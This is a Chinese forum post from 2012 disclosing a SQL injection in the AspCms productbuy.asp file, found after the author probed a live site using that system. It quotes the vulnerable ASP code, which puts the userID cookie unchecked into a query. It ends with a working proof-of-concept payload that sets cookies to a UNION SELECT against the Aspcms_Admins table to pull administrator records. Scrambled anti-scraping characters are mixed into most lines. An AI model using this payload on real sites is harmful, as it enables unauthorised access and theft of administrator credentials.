好久没上土司了,上来一看发现在删号名单内..... j' u2 @- _2 a; E: r: a( f
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
0 V4 E3 L* _* d ]* n废话不多说,看代码:
0 R! I5 r0 A, {4 L. }/ I3 U1 ^+ k# T$ f5 ]
<%- V' J9 P. t# U3 o
% O. D2 y( ~3 _4 m( T/ B- nif action = "buy" then
# E+ }. A+ { U! a0 Z1 `. F0 G( i. t* ?/ `% {/ ?& g
addOrder() P' B6 {! f. k
! z! n5 R/ X, _5 F! P3 k& j
else: P% ^ M% h1 c+ `# `+ |/ [2 ~- B- [
' [. C/ ]% n* |; C1 t
echoContent()
- s. q/ ^2 f" _- b2 K5 h3 B4 F) O0 S% X+ F
end if3 t0 z- y9 g# z& Y
9 q& I1 R, C4 v- U7 O
1 u, _% t% i/ T
" y& O2 N! v T# H( e7 W3 Q……略过
9 D, i" I! p! @) |
4 ?) z; U L4 @2 `) v- [9 e0 u
; }7 t4 z! E$ O" G
) p# c' K/ U6 I! q. S( y2 p3 e, [Sub echoContent()! W% c' D8 B5 ` Q* p% d1 [) \
S# i8 b; E& l0 C( w$ D# L
dim id
5 h1 d' b: j" A4 r8 _. d3 J9 C7 _; Y) v6 _+ y) o' I3 A
id=getForm("id","get")6 r$ W4 ~0 u: ~) F2 D5 Z$ s# C
6 A7 q4 W0 D" v& b7 {' \( o
3 z! M2 H& }) F: Y1 d5 v; N7 z0 x8 i7 q' i2 i& r& ?
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
9 i$ N+ @$ h1 ~5 o( m9 ~5 A8 T1 T7 g1 [0 A& k
* P) e8 `8 M$ Y4 H; T" p. M
. g- d8 R/ |" _& B6 ? dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")4 a" [. v8 v6 a) k; C
* Q4 _% g- i% ?( e( _9 ^4 ` dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct/ o8 h8 A7 P8 H# ` h
% i2 g& o E" _ Dim templatePath,tempStr
- E! |: F" v/ u: b; n% p7 ?3 J# `7 i5 H7 c; D3 p
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
$ z+ Q) w# J. C2 [% B+ p, I: ~4 p. s/ F' ]: v! `
2 b( M4 r" C3 E. D* Q w6 @; z& p3 p9 c+ u0 G9 Z
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
4 _( A* ?: D& N/ M4 o. m$ D# G3 Z+ G+ L0 ]
selectproduct=rsObj(0)
1 z4 o' n# k: Y% H" O$ ^* }6 q1 F1 n7 q6 _5 d& ^# J j6 }2 ^
" T$ S8 E" C' B
4 U9 J1 _2 J& M$ K
Dim linkman,gender,phone,mobile,email,qq,address,postcode
& L9 f! Q+ X# L1 v& {2 w: H& G# d% b, n: a6 r% @, J5 y
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0& J! b% f) W9 d) m4 r1 a
7 L. z" j- U5 j0 ~7 z if rCookie("loginstatus")=1 then 7 Z- R# e3 D: C I
4 s& h5 C# @2 k( u, y0 b set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1"); d. W% W' k. Y8 D5 a9 ~
4 p: D, @, c, n# O- X i
linkman=rsObj("truename")9 U- I+ F! N( E9 B' \
2 Q0 l" ?; j' v; s5 n
gender=rsObj("gender")
! M- m+ i& f5 |" }. |) z- W6 f$ l- x' n. m! {6 g# m
phone=rsObj("phone"); a$ u' p* ^. c+ U2 S
# T/ a: D3 Y2 q! A: S+ k6 Q mobile=rsObj("mobile")
8 V" X0 [6 R/ R" H' N! ?% D
8 h9 ^" d7 B, ]' u* E- t& ?2 e c email=rsObj("email")
9 h( @+ v4 V w: l4 d- w, v& { _( J$ h s% O$ r
qq=rsObj("qq")2 \" {# _" }2 q3 ?; Z+ i+ ~0 k
; _/ d" Y& ?6 f& }7 E( d! _
address=rsObj("address")
" u0 T; L8 O* Q$ C9 G
9 h r6 H0 L' G$ E; P' a; _ postcode=rsObj("postcode")( Z5 r8 ?: S' p. d
" B% G9 l9 Y2 ]& I0 \0 Q else
- S; S: `* a% h; z+ z
( [+ g! F9 ^ J! }% I gender=14 @* q# C1 I. a% k5 d
n4 r1 l& q+ a% F" k
end if
* r. K! W" r* o2 c5 h: h5 t5 \/ X/ g, ?
rsObj.close()
7 ?4 ^2 Z4 A6 L" A
1 S+ f6 g6 T8 Y x) x2 Z. l: v5 S
& R! ]' S; I, U
v" z5 J- }1 p: C, d$ K' b with templateObj " ]6 }" O- v* L0 }
) e9 f r; m( W; Y' V
.content=loadFile(templatePath) * H: ]! k7 N2 d! l$ r
9 N( ^) d+ W0 ~
.parseHtml()
1 B# Y5 B* K; m. c6 ?' `$ B
$ z C& @$ C8 ]/ D+ A .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct): f' ?( k3 r: \4 j8 _ B
" f4 \3 B, _2 Z: }* d, [- k! u
.content=replaceStr(.content,"[aspcms:linkman]",linkman) ) {9 F( g0 a9 n0 @
w; f! D1 A4 Q4 g: @: R
.content=replaceStr(.content,"[aspcms:gender]",gender) - r$ A, y) K& I0 Z* _
* ?7 Y. M l: j# b' T
.content=replaceStr(.content,"[aspcms:phone]",phone)
3 j) u3 F! O6 Q% O
5 N/ X' Z% S9 P3 \5 M. h H8 H1 G .content=replaceStr(.content,"[aspcms:mobile]",mobile)
: `! V7 [, m- l0 K( [. K1 R
6 Q3 P. q7 `- Q! w$ d .content=replaceStr(.content,"[aspcms:email]",email) 5 n0 ~5 \1 _: }; Y6 e2 t
1 h5 k- l& |8 p* p7 G2 r/ C. b
.content=replaceStr(.content,"[aspcms:qq]",qq) / v3 j( H5 N! } H; T8 @+ g+ |
l2 q4 v2 }3 J' ]
.content=replaceStr(.content,"[aspcms:address]",address) / C& ~7 [( }6 E9 c& T
8 X% l: f' A: X' ]+ B .content=replaceStr(.content,"[aspcms:postcode]",postcode)
) \3 u5 M+ X( v: _( ?* x4 M6 _
* o3 v7 l, y* n .parseCommon()
6 t& P" o$ f; ~
- x" h9 Y+ w, W! i4 u+ _' O6 j g" _ echo .content 4 o# r% u3 ^6 F$ x" H0 t i
& U2 F! C3 G% ?- i end with
% P# x3 D- t1 W. c7 B9 J8 x+ P' h
set templateobj =nothing : terminateAllObjects
! t) ~% T* [, i+ L3 w& T
* @+ I {1 W8 D5 f& TEnd Sub4 u" x1 ^/ Q4 E4 g4 U7 \! d
漏洞很明显,没啥好说的
) Z8 _& ~5 T, w& [0 fpoc:1 Q) x% L- J8 f" N, f
. O( E4 h8 f# ]. h8 G5 \! gjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子0 \, x( w% x& e. M& p8 j+ S
/ N! V6 b5 h* s% g. l |
发表于 2012-12-27 08:35:05
收藏
支持
反对